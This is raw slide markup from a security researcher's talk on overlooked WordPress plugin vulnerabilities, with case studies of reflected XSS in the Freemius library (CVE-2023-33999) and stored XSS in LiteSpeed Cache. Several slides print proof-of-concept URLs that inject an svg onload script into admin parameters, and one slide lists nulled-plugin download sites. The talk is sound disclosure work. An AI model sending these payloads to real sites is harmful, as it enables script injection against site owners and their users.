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Darker Grotesque Medium"/>
      <p:regular r:id="rId57"/>
      <p:bold r:id="rId58"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Darker Grotesque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DarkerGrotesq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DarkerGrotesqueMedium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DarkerGrotesque-regular.fntdata"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/DarkerGrotesque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dfc883ca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dfc883ca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fc883ca2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fc883ca2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fc883ca2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dfc883ca2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dfc883ca27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dfc883ca27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fc883ca27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dfc883ca27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fc883ca27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dfc883ca27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fc883ca27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dfc883ca27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78030244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78030244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72d1f80ea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72d1f80ea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fc883ca27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dfc883ca27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dfc883ca27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dfc883ca27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dfc883ca2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dfc883ca2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dfc883ca27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dfc883ca27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e78030244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e78030244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dfc883ca27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dfc883ca27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2b5dfd8e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72b5dfd8e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dfc883ca27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dfc883ca27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dfc883ca27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dfc883ca27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e78030244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e78030244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dfc883ca27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dfc883ca27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dfc883ca27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dfc883ca27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e78030244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e78030244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fc883ca27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dfc883ca27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dfc883ca27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dfc883ca27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e0167d3ab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e0167d3ab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e0167d3ab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e0167d3ab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dfc883ca27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dfc883ca27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dfc883ca27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dfc883ca27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e78030244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e78030244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dfc883ca27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dfc883ca27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dfc883ca27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dfc883ca27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e78030244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e78030244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dfc883ca27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dfc883ca27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fc883ca2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dfc883ca2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dfc883ca27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dfc883ca27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dfc883ca27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dfc883ca27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e78030244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e78030244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dfc883ca27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dfc883ca27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dfc883ca27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dfc883ca27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dfc883ca27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dfc883ca27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72b5dfd8e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72b5dfd8e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72b5dfd8e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72b5dfd8e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dfc883ca27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dfc883ca27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dfc883ca27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dfc883ca27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fc883ca2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dfc883ca2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dfc883ca2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2dfc883ca2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e7803024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2e7803024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fc883ca27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fc883ca2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fc883ca2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dfc883ca2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780302446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780302446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fc883ca2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fc883ca2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303">
          <p15:clr>
            <a:srgbClr val="FA7B17"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="288">
          <p15:clr>
            <a:srgbClr val="FA7B17"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="5472">
          <p15:clr>
            <a:srgbClr val="FA7B17"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="2880">
          <p15:clr>
            <a:srgbClr val="FA7B17"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="177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hyperlink" Target="https://wplocker.net/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://weadown.com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18.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26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22.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image34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30.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId16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hyperlink" Target="http://drive.google.com/file/d/1WN2dZoIpzmTjDm5dORi4OFT8x8aEs_fo/view" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.jp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8.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId16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9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25.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId16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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.png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40.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image33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37.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId16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hyperlink" Target="https://thehackernews.com/2024/05/hackers-exploiting-litespeed-cache-bug.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://drive.google.com/file/d/1B3ZpKFg8C0ubDm-3l5_83HCoc-hfMDmB/view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39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24.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.png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32.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31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hyperlink" Target="http://drive.google.com/file/d/1Y8FekDfzRuiF_ptKMbBjeEqq_in9ZpRb/view" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.jp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45.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35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59.png"/><Relationship Id="rId1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hyperlink" Target="http://drive.google.com/file/d/1Rdj8jwAI9n5boK9rXcMnOg2yhUIbFy8b/view" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.png"/><Relationship Id="rId16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36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44.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43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52.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36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hyperlink" Target="https://blog.sucuri.net/2023/05/vulnerability-in-essential-addons-for-elementor-leads-to-mass-infection.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image36.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://drive.google.com/file/d/14LajJUyAAeZxVoxG9BbQX7lEJsmRO0_0/view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51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58.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46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49.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51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hyperlink" Target="http://drive.google.com/file/d/1o1AcU0AfG7AP0w-wRGvc44eyjHJsjMDO/view" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image53.jp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47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50.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48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54.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47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63.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61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64.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47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hyperlink" Target="http://drive.google.com/file/d/1JQpKKrvuas_h3_2l4O1qhW3Ltv5XbSL7/view" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image47.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image62.jp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60.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image55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bleepingcomputer.com/news/security/critical-wordpress-plugin-bug-allows-admin-logins-without-password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thehackernews.com/2019/09/webarx-web-application-security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hyperlink" Target="https://threatpost.com/wordpress-bug-leaves-sites-open-to-attack/151911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20.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wpdirectory.net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www.theregister.co.uk/2020/01/15/update_wordpress_plugins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zdnet.com/article/critical-bugs-in-wordpress-plugins-infinitewp-wp-time-capsule-expose-300000-websites-to-attac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615575" y="1194550"/>
            <a:ext cx="7668600" cy="25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Uncharted Depths - </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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Navigating Overlooked Vulnerabilities in the Sea of Million WordPress Sites</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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57" name="Google Shape;57;p14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58" name="Google Shape;58;p14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4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4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4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4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14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pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="Google Shape;64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60825" y="4172300"/>
            <a:ext cx="3822474" cy="9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667750" y="2183850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Research Target</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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186" name="Google Shape;186;p23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187" name="Google Shape;187;p23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3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3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3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3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23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4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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584275" y="271225"/>
            <a:ext cx="7668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Making the right decision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200" name="Google Shape;200;p24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4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4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4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4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4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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="206" name="Google Shape;206;p24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2787125" y="3586625"/>
            <a:ext cx="4608900" cy="18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24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2809625" y="1103975"/>
            <a:ext cx="0" cy="2472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4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2954850" y="1524800"/>
            <a:ext cx="3885600" cy="1902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24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1277525" y="1720913"/>
            <a:ext cx="1974900" cy="1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Likelihood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c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ritical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>impactful vulnerability found/exist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3512525" y="3601450"/>
            <a:ext cx="2941800" cy="1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Plugins/Themes popularity or active install counts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5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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584275" y="271225"/>
            <a:ext cx="7668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Initial approach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217" name="Google Shape;217;p25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218" name="Google Shape;218;p25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5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5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5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5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25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224" name="Google Shape;224;p25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710600" y="1504650"/>
            <a:ext cx="76686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For free version, fetch the plugins/themes via the installer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For premium version, try to fetch the nulled version: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○"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Darker Grotesque"/>
                <a:ea typeface="Darker Grotesque"/>
                <a:cs typeface="Darker Grotesque"/>
                <a:sym typeface="Darker Grotesque"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>https://weadown.com/</a:t>
            </a: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○"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:latin typeface="Darker Grotesque"/>
                <a:ea typeface="Darker Grotesque"/>
                <a:cs typeface="Darker Grotesque"/>
                <a:sym typeface="Darker Grotesque"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>https://wplocker.net/</a:t>
            </a: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○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Disclaimer: nulled version could be dangerous, only test in an isolated environment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Analyze the code, additionally with xDebug for dynamic analysis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6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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584275" y="271225"/>
            <a:ext cx="7668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Choosing priorities for vulns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231" name="Google Shape;231;p26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232" name="Google Shape;232;p26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6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6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6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6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26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238" name="Google Shape;238;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="710600" y="1504650"/>
            <a:ext cx="7668600" cy="25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Privilege Escalation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XSS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SQL Injection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PHP Object Injection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RCE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LFI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Arbitrary File Read and Deletion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737700" y="2127450"/>
            <a:ext cx="76686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Overlooked XSS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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Case Studies</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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245" name="Google Shape;245;p27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246" name="Google Shape;246;p27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7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7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27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7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27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8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CVE-2023-33999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Site-Wide Reflected XSS in Freemius Library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258" name="Google Shape;258;p28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259" name="Google Shape;259;p28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8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8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8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8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28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265" name="Google Shape;265;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="705875" y="1507475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266" name="Google Shape;266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54025" y="337000"/>
            <a:ext cx="865950" cy="86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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659250" y="1536300"/>
            <a:ext cx="7825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Vulnerability Details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Introduced: v1.0.8 (23/06/2015)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Patched: v2.5.10 (18/07/2023)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Vulnerable code age: 8yr1mo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Active installation: 7+ million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Background Story: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Initially, looking for vulns on TablePress plugin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Notice that it uses Freemius library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Found out the library massively used on other plugins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9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CVE-2023-33999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Site-Wide Reflected XSS in Freemius Library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274" name="Google Shape;274;p29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275" name="Google Shape;275;p29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29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9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29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29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29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281" name="Google Shape;281;p29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="705875" y="1507475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282" name="Google Shape;282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54025" y="337000"/>
            <a:ext cx="865950" cy="8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3250" y="1202950"/>
            <a:ext cx="3836452" cy="391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713625" y="1568750"/>
            <a:ext cx="4228101" cy="317932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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4713575" y="2218575"/>
            <a:ext cx="4228200" cy="5598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5001375" y="3551550"/>
            <a:ext cx="2455800" cy="5598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87" name="Google Shape;287;p29"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4397475" y="1549175"/>
            <a:ext cx="671400" cy="530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8" name="Google Shape;288;p29"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="281" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="516275" y="1618775"/>
            <a:ext cx="466200" cy="87000"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd fmla="val 8398" name="adj1"/>
              <a:gd fmla="val 373707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9" name="Google Shape;289;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877475" y="4766675"/>
            <a:ext cx="2455800" cy="3159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792875" y="3395575"/>
            <a:ext cx="2098200" cy="2652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91" name="Google Shape;291;p29"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="290" idx="6"/>
            <a:endCxn id="289" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2891075" y="3528175"/>
            <a:ext cx="442200" cy="1396500"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd fmla="val 15385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92" name="Google Shape;292;p29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357400" y="1758675"/>
            <a:ext cx="395400" cy="1767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0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0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CVE-2023-33999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Site-Wide Reflected XSS in Freemius Library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299" name="Google Shape;299;p30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300" name="Google Shape;300;p30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0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30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30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30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30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306" name="Google Shape;306;p30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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307" name="Google Shape;307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54025" y="337000"/>
            <a:ext cx="865950" cy="8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09400" y="1443050"/>
            <a:ext cx="4981274" cy="24176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9" name="Google Shape;309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655425" y="1307450"/>
            <a:ext cx="4342973" cy="26888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0" name="Google Shape;310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331800" y="4132125"/>
            <a:ext cx="4640650" cy="9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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251500" y="2660425"/>
            <a:ext cx="4198200" cy="4383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12" name="Google Shape;312;p30"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3088175" y="3030800"/>
            <a:ext cx="1758000" cy="646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1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CVE-2023-33999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Site-Wide Reflected XSS in Freemius Library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319" name="Google Shape;319;p31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320" name="Google Shape;320;p31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31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31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1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1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p31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326" name="Google Shape;326;p31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1554425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327" name="Google Shape;327;p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54025" y="337000"/>
            <a:ext cx="865950" cy="86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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7297350" y="2905275"/>
            <a:ext cx="10719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Patch?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2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329" name="Google Shape;329;p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00650" y="2298175"/>
            <a:ext cx="6268799" cy="267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00638" y="1578975"/>
            <a:ext cx="7996524" cy="5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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4193400" y="3719950"/>
            <a:ext cx="2845200" cy="4383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2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CVE-2023-33999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Site-Wide Reflected XSS in Freemius Library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338" name="Google Shape;338;p32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339" name="Google Shape;339;p32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32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2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2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32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32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345" name="Google Shape;345;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6202450" y="1554425"/>
            <a:ext cx="216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346" name="Google Shape;346;p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54025" y="337000"/>
            <a:ext cx="865950" cy="86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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544475" y="1923175"/>
            <a:ext cx="5235900" cy="57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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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/wp-admin/?purchase_completed=1&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFF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purchase_email=&lt;svg/onload=alert(document.domain)&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FFFF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48" name="Google Shape;348;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6499688" y="1442875"/>
            <a:ext cx="1479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PoC Demo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49" name="Google Shape;349;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663875" y="2670188"/>
            <a:ext cx="4997100" cy="57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http://URL/wp-admin/?purchase_completed=1&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFF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purchased_plan=&lt;svg/onload=alert(document.domain)&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FFFF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50" name="Google Shape;350;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584295" y="1442875"/>
            <a:ext cx="3792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Case 1: Opt-in (Example)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51" name="Google Shape;351;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544470" y="3417225"/>
            <a:ext cx="3792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Case 2: Skip Opt-in </a:t>
            </a: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(Example)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514775" y="3914525"/>
            <a:ext cx="5295300" cy="7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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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URL</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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/wp-admin/admin.php?fs_action=&lt;PLUGIN_SLUG&gt;_activate_new&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="FFFF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user_email=&lt;svg/onload=alert(document.domain)&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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&amp;pending_activation=1 </a:t>
            </a:r>
            <a:endParaRPr b="1"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53" name="Google Shape;353;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6181300" y="3578625"/>
            <a:ext cx="2209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*) tested on vulnerable TablePress </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1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plugin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1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354" name="Google Shape;354;p32" title="PoC_Freemius_XSS_TablePress.mov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950819" y="2034725"/>
            <a:ext cx="2670157" cy="150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584275" y="271225"/>
            <a:ext cx="7668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Whoami ~ Rafie Muhammad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71" name="Google Shape;71;p15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72" name="Google Shape;72;p15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5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5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5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5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5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78" name="Google Shape;78;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="690700" y="1307925"/>
            <a:ext cx="76686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Security Researcher at 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Also known as “Yeraisci”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Focused on WebAppSec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Partially Active CTF player for SKSD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Bug Bounty hunter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PHP enjoyer :)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999400" y="1397750"/>
            <a:ext cx="2054400" cy="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577299" y="348001"/>
            <a:ext cx="711960" cy="4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41150" y="2186625"/>
            <a:ext cx="474350" cy="4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3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3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</a:t>
            </a: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2023-40000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Site-Wide Unauth Stored XSS in LiteSpeed Cache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361" name="Google Shape;361;p33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362" name="Google Shape;362;p33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33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33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33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33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33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pic>
        <p:nvPicPr>
          <p:cNvPr id="368" name="Google Shape;368;p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47925" y="302575"/>
            <a:ext cx="772050" cy="7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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659250" y="1536300"/>
            <a:ext cx="7825500" cy="25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Vulnerability Details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Introduced: v5.0 (25/07/2022)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Patched: v5.7.0.1 (25/10/2023)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Vulnerable code age: 1yr3mo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Active installation: 5+ million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Background Story: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Initially, looking for Broken Access Control on API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4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4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CVE-2023-40000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Site-Wide Unauth Stored XSS in LiteSpeed Cache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376" name="Google Shape;376;p34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377" name="Google Shape;377;p34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34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34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34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34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34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pic>
        <p:nvPicPr>
          <p:cNvPr id="383" name="Google Shape;383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47925" y="302575"/>
            <a:ext cx="772050" cy="7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00000" y="2477225"/>
            <a:ext cx="4814177" cy="2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4000" y="1699475"/>
            <a:ext cx="3733827" cy="10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71250" y="4019475"/>
            <a:ext cx="3679324" cy="7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69050" y="2944676"/>
            <a:ext cx="3083725" cy="86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34"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2232475" y="2556100"/>
            <a:ext cx="1038300" cy="636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9" name="Google Shape;389;p34"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="2918675" y="3174375"/>
            <a:ext cx="1590900" cy="1011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0" name="Google Shape;390;p34"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="386" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-626050" y="3234212"/>
            <a:ext cx="2081400" cy="286800"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector4">
            <a:avLst>
              <a:gd fmla="val 5519" name="adj1"/>
              <a:gd fmla="val 149102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1" name="Google Shape;391;p34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4481000" y="4168000"/>
            <a:ext cx="2644500" cy="3600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5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5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CVE-2023-40000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Site-Wide Unauth Stored XSS in LiteSpeed Cache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398" name="Google Shape;398;p35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399" name="Google Shape;399;p35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35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35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35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35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35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pic>
        <p:nvPicPr>
          <p:cNvPr id="405" name="Google Shape;405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47925" y="302575"/>
            <a:ext cx="772050" cy="7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00650" y="1190475"/>
            <a:ext cx="3608200" cy="3872973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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="432975" y="2420475"/>
            <a:ext cx="3876000" cy="3600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08" name="Google Shape;408;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="907675" y="4388225"/>
            <a:ext cx="1590900" cy="2127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09" name="Google Shape;409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864125" y="1190475"/>
            <a:ext cx="3708447" cy="3872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0" name="Google Shape;410;p35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4057150" y="1764375"/>
            <a:ext cx="1087800" cy="584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1" name="Google Shape;411;p35"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="408" idx="6"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2498575" y="1627475"/>
            <a:ext cx="2379000" cy="28671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35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4951600" y="4754500"/>
            <a:ext cx="2737500" cy="2586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13" name="Google Shape;413;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6740850" y="3945925"/>
            <a:ext cx="285900" cy="2127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14" name="Google Shape;414;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5812925" y="3281200"/>
            <a:ext cx="2193900" cy="2838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15" name="Google Shape;415;p35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
